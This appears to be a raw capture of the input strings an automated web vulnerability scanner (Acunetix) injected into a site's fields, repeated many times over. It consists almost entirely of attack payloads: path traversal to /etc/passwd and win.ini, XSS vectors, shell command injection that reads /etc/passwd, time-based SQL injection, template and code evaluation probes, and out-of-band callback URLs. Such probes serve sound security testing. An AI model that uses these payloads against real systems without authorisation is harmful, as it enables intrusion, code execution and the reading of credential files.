..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

kN5kpJu6')

1

http://www.acunetix.tst

1

1

1

comments

"&dir&"

RuBQqYkL'))

1

1

'"

file:///etc/passwd

1

1'"()&%<ScRiPt >prompt(983367)</ScRiPt>

1

|dir

1

comments/.

1

'"()&%<ScRiPt >prompt(955373)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

<!--

1

1

1

1

'|dir

1_929503

1

WEB-INF/web.xml

1

1

"|dir

1

1

1

acu6803\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6803

1

WEB-INF\web.xml

1

1

1

1

1

acux7325\xc0\xbez1\xc0\xbcz2a\x90bcxuca7325

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(969175)</ScRiPt>

1

1

1

1<script>prompt(955815)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(962688)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932470></ScRiPt>

1

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(960022)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(917276)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(915063)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<div style=width:expression(prompt(968315))>

1

1

response.write(9510713*9699131)

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<iframe src='data:text/html

'+response.write(9510713*9699131)+'

1

1

&cat /etc/passwd&

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<body onload=prompt(992056)>

1

"+response.write(9510713*9699131)+"

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929467)>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(954818)>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

`cat /etc/passwd`

1

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(981186)>

1

-1

1

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99224+100403}

1<ScRiPt%20>prompt(948752)</sCripT>

1

-1)

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&lt

1&n906857=v967563

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

-1))

\xf6<img acu onmouseover=prompt(901997) //\xf6>

1some_inexistent_file_with_long_name%00.jpg

)

1

1

qxxUhpIr'

1<input autofocus onfocus=prompt(929857)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

MwTkW3ov')

1

/etc/passwd

<a href='http://www.acunetix.com'>website security</a>

'

1

'

testasp.vulnweb.com

xAtXqdsA'))

1

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

[url=http://www.acunetix.com]website security[/url]

"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

${@print(md5(acunetix_wvs_security_test))}

1

1

1_vK77v <ScRiPt >prompt(928687)</ScRiPt>

||cat /etc/passwd

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

http://hitIaxuoqpYVt.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

1

1

acunetix_wvs_invalid_filename

1

-1))

1

1

1

'&dir&'

1

Mzt7lvju'

1

comments

1

1

file:///etc/passwd

1

http://www.acunetix.tst

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GorbKRFy')

1

comments

1

'"

1

/\../\../\../\../\../\../\../etc/passwd

EAW4DFdz'))

|dir

1

1

comments/.

1

1

WEB-INF/web.xml

<!--

1'"()&%<ScRiPt >prompt(933838)</ScRiPt>

1

1

1

1

'|dir

1

'"()&%<ScRiPt >prompt(954945)</ScRiPt>

1

WEB-INF\web.xml

"|dir

1

1

1

1

1_955204

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

acu8318\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8318

1

1

1

1

acux5230\xc0\xbez1\xc0\xbcz2a\x90bcxuca5230

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(938195)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(993529)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(954447)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929153></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(987500)</ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(978789)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(943822)"></g></svg>

response.write(9247313*9242039)

1

1

&cat /etc/passwd&

WEB-INF/web.xml

1

1<div style=width:expression(prompt(960980))>

'+response.write(9247313*9242039)+'

'&cat /etc/passwd&'

1

1

WEB-INF\web.xml

"+response.write(9247313*9242039)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

../../../../../../../../../../etc/passwd

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(912327)>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928353)>

SomeCustomInjectedHeader:injected_by_wvs

1

-1

|cat /etc/passwd#

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99519+100455}

-1)

1

1

1<img src=xyz OnErRor=prompt(989773)>

'|'ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1))

"|"ld

1<img/src=">" onerror=alert(951832)>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n922795=v911558

1

HoM9XFJa'

1some_inexistent_file_with_long_name%00.jpg

)

1<ScRiPt%20>prompt(943397)</sCripT>

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

yw2gtkm6')

1

1

/etc/passwd

"

1

\xf6<img acu onmouseover=prompt(964186) //\xf6>

testasp.vulnweb.com

^(#$!@#$)(()))******

Wy4KurNv'))

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

1

1

1<input autofocus onfocus=prompt(927571)>

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

&dir

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'&dir&'

-1))

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hit2FosotAXUj.bxss.me/

acunetix_wvs_invalid_filename

1

[url=http://www.acunetix.com]website security[/url]

"&dir&"

1

1

1

IgtRM1LK'

file:///etc/passwd

1_xEgRC <ScRiPt >prompt(956361)</ScRiPt>

1

1

comments

1

|dir

DZ9HEAY3')

1

/\../\../\../\../\../\../\../etc/passwd

1

1

http://www.acunetix.tst

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

'"

WEB-INF/web.xml

1

1

iWmEkvI3'))

'|dir

comments/.

1

1

1

<!--

"|dir

1

1

WEB-INF\web.xml

1

1

1

1

1'"()&%<ScRiPt >prompt(965587)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1

'"()&%<ScRiPt >prompt(924324)</ScRiPt>

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1_924278

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acu2393\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2393

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acux9426\xc0\xbez1\xc0\xbcz2a\x90bcxuca9426

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(925426)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(922700)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(955190)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948324></ScRiPt>

1

1

1<ScRiPt >prompt(995244)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(970391)">

1

response.write(9028791*9613982)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(902215)"></g></svg>

1

1

WEB-INF/web.xml

'+response.write(9028791*9613982)+'

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(917952))>

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9028791*9613982)+"

WEB-INF\web.xml

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(948965)>

"&cat /etc/passwd&"

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987863)>

${100415+100047}

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

-1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(902427)>

`cat /etc/passwd`

1

1

1

1

-1)

1

1<img/src=">" onerror=alert(977393)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

-1))

)

1&n925211=v915938

1

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(923073)</sCripT>

1

1

'"()

1

!(()&&!|*|*|

1AbPsVly'

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

3sAenBpq')

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

\xf6<img acu onmouseover=prompt(982732) //\xf6>

'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

TpcOuTfJ'))

1

"

1

1

1<input autofocus onfocus=prompt(958624)>

'

1

-1

1

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

-1)

"

http://hitYuM5JMWYsB.bxss.me/

1

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

1

LQWb8OHo'

1

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1_NxUjk <ScRiPt >prompt(923934)</ScRiPt>

1

1

mH2pf9Fc')

1

1

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

KcjsZMUU'))

'"

http://www.acunetix.tst

1

'&dir&'

1'"()&%<ScRiPt >prompt(971362)</ScRiPt>

comments/.

1

1

<!--

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(956747)</ScRiPt>

file:///etc/passwd

1

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1_958883

|dir

1

1

1

1

1

WEB-INF/web.xml

acu2662\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2662

1

1

'|dir

acux3386\xc0\xbez1\xc0\xbcz2a\x90bcxuca3386

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(968207)</ScRiPt>

1

1

1

1<script>prompt(902549)</script>

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(903499)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?982530></ScRiPt>

1

................windowswin.ini

1

1

1

1<ScRiPt >prompt(970060)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(961972)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951452)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(910371))>

1

response.write(9417857*9483250)

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'+response.write(9417857*9483250)+'

1

1<body onload=prompt(928035)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921851)>

&cat /etc/passwd&

1

"+response.write(9417857*9483250)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

'&cat /etc/passwd&'

1<img src=xyz OnErRor=prompt(985713)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

"&cat /etc/passwd&"

-1

1<img/src=">" onerror=alert(921436)>

1

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<ScRiPt%20>prompt(993994)</sCripT>

-1)

cat /etc/passwd

${99407+100294}

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1&n958259=v927633

-1))

1

1&lt

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

Bi4ezldt'

)

\xf6<img acu onmouseover=prompt(939982) //\xf6>

1

1

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

'"()

!(()&&!|*|*|

fWEI5xdV')

1

1<input autofocus onfocus=prompt(994762)>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

iNl6Dfxr'))

^(#$!@#$)(()))******

1

1

1

/etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

"

1

1

-1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1_BgUnu <ScRiPt >prompt(951243)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

"

-1)

1

1

1

1

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitmCCMPO0Kz3.bxss.me/

1

1

-1))

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

C3DaWBPY'

1

1

&dir

1

1

comments

1

'"

'&dir&'

KaFngIju')

1

http://www.acunetix.tst

1

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(940183)</ScRiPt>

<!--

"&dir&"

WDfFdQki'))

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

1

'"()&%<ScRiPt >prompt(949318)</ScRiPt>

WEB-INF/web.xml

1

1

1

'|dir

1_963560

1

WEB-INF\web.xml

1

1

"|dir

../../../../../../../../../../windows/win.ini

acu6980\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6980

1

1

1

../../../../../../../../../../boot.ini

1

acux6651\xc0\xbez1\xc0\xbcz2a\x90bcxuca6651

1

1

1

1<ScRiPt >prompt(903808)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(945128)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(921511)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985810></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(908619)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(935919)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925925)"></g></svg>

1

1<div style=width:expression(prompt(958066))>

1

1

1<iframe src='data:text/html

WEB-INF/web.xml

1

1

1<body onload=prompt(904876)>

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969043)>

1

1

1

1

1<img src=xyz OnErRor=prompt(937983)>

1

1

1<img/src=">" onerror=alert(952710)>

1

1

1

1<ScRiPt%20>prompt(969588)</sCripT>

1

1&lt

1

1

1

\xf6<img acu onmouseover=prompt(936641) //\xf6>

1

1<input autofocus onfocus=prompt(916248)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_5uhaJ <ScRiPt >prompt(923640)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9121934*9259872)

1

1

&cat /etc/passwd&

'+response.write(9121934*9259872)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9121934*9259872)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

-1

../../../../../../../../../../etc/passwd.jpg

1

1

${99714+99354}

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1)

1

|cat /etc/passwd#

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n980652=v953920

1

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

)

1

1some_inexistent_file_with_long_name%00.jpg

1

qmEPw1FQ'

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

mvNX7zJK')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

^(#$!@#$)(()))******

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

testasp.vulnweb.com

1

ThtENTDM'))

1

"

/etc/passwd

1

1

1

"

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

-1

http://hitLzvYiH6EUr.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}\

&dir

comments

1

1

1

1

'&dir&'

-1))

1

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

R2ryIwBe'

1

1

|dir

1

1'"()&%<ScRiPt >prompt(904149)</ScRiPt>

'"

1

UVGQ7xfq')

1

1

'|dir

'"()&%<ScRiPt >prompt(922508)</ScRiPt>

file:///etc/passwd

J0YglmAg'))

<!--

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1_915016

1

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

acu5204\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5204

1

1

1

../../../../../../../../../../windows/win.ini

acux1664\xc0\xbez1\xc0\xbcz2a\x90bcxuca1664

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(970169)</ScRiPt>

1

1

1<script>prompt(912318)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(915125)</ScRiPt>

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?927877></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(949795)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(904298)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9183804*9445549)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985783)"></g></svg>

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(937309))>

'+response.write(9183804*9445549)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

WEB-INF/web.xml

1<iframe src='data:text/html

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9183804*9445549)+"

"&cat /etc/passwd&"

1<body onload=prompt(987203)>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929734)>

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(942020)>

1

1

${100160+100309}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1

|cat /etc/passwd#

1

1

1

1<img/src=">" onerror=alert(900490)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n904743=v961333

1

1<ScRiPt%20>prompt(947214)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

"|"ld

)

1

1

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

2MGS7uOz'

1

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(967738) //\xf6>

/etc/passwd

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

^(#$!@#$)(()))******

'

1

'"()

YKki7ygq')

1<input autofocus onfocus=prompt(906923)>

"

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

<a href='http://www.acunetix.com'>website security</a>

KnLz3AY6'))

1

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

